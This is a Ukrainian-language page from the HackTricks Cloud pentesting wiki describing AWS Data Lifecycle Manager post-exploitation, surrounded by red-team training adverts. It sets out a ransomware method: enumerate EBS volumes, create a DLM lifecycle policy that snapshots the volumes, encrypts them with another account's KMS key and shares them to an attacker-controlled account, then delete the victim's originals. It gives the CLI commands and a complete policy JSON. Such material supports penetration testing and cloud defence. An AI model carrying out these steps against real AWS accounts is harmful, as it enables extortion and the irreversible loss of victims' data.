HackTricks CloudAWS - DLM Post Exploitation
Reading time: 3 minutes
tip
Вивчайте та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Підтримка HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.
Data Lifecycle Manger (DLM)
EC2:DescribeVolumes, DLM:CreateLifeCyclePolicy
Ransomware-атаку можна реалізувати, зашифрувавши якомога більше EBS volumes, а потім видаливши поточні EC2 instances, EBS volumes та snapshots. Щоб автоматизувати таку шкідливу діяльність, можна використати Amazon DLM — шифрувати snapshots за допомогою KMS key з іншого AWS account і переносити зашифровані snapshots до іншого акаунта. Альтернативно, можна перенести snapshots без шифрування до акаунта, яким вони керують, а потім зашифрувати їх там. Хоча безпосередньо зашифрувати існуючі EBS volumes або snapshots не так просто, це можна зробити, створивши новий volume або snapshot.
По-перше, використовують команду для збору інформації про volumes, таких як instance ID, volume ID, encryption status, attachment status та volume type.
aws ec2 describe-volumes
По-друге, створюється lifecycle policy. Ця команда використовує DLM API для налаштування lifecycle policy, яка автоматично робитиме daily snapshots зазначених volumes у визначений час. Вона також застосовує певні теги до snapshots та копіює теги з volumes на snapshots. Файл policyDetails.json містить деталі lifecycle policy, такі як target tags, schedule, ARN опційного KMS key для шифрування та target account для snapshot sharing, що буде зафіксовано у жертви в CloudTrail logs.
aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
Шаблон документа політики можна переглянути тут:
{
"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
"ResourceTypes": [
"VOLUME"
],
"TargetTags": [
{
"Key": "ExampleKey",
"Value": "ExampleValue"
}
],
"Schedules": [
{
"Name": "DailySnapshots",
"CopyTags": true,
"TagsToAdd": [
{
"Key": "SnapshotCreator",
"Value": "DLM"
}
],
"VariableTags": [
{
"Key": "CostCenter",
"Value": "Finance"
}
],
"CreateRule": {
"Interval": 24,
"IntervalUnit": "HOURS",
"Times": [
"03:00"
]
},
"RetainRule": {
"Count": 14
},
"FastRestoreRule": {
"Count": 2,
"Interval": 12,
"IntervalUnit": "HOURS"
},
"CrossRegionCopyRules": [
{
"TargetRegion": "us-west-2",
"Encrypted": true,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
"CopyTags": true,
"RetainRule": {
"Interval": 1,
"IntervalUnit": "DAYS"
}
}
],
"ShareRules": [
{
"TargetAccounts": [
"123456789012"
],
"UnshareInterval": 30,
"UnshareIntervalUnit": "DAYS"
}
]
}
],
"Parameters": {
"ExcludeBootVolume": false
}
}
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Підтримка HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.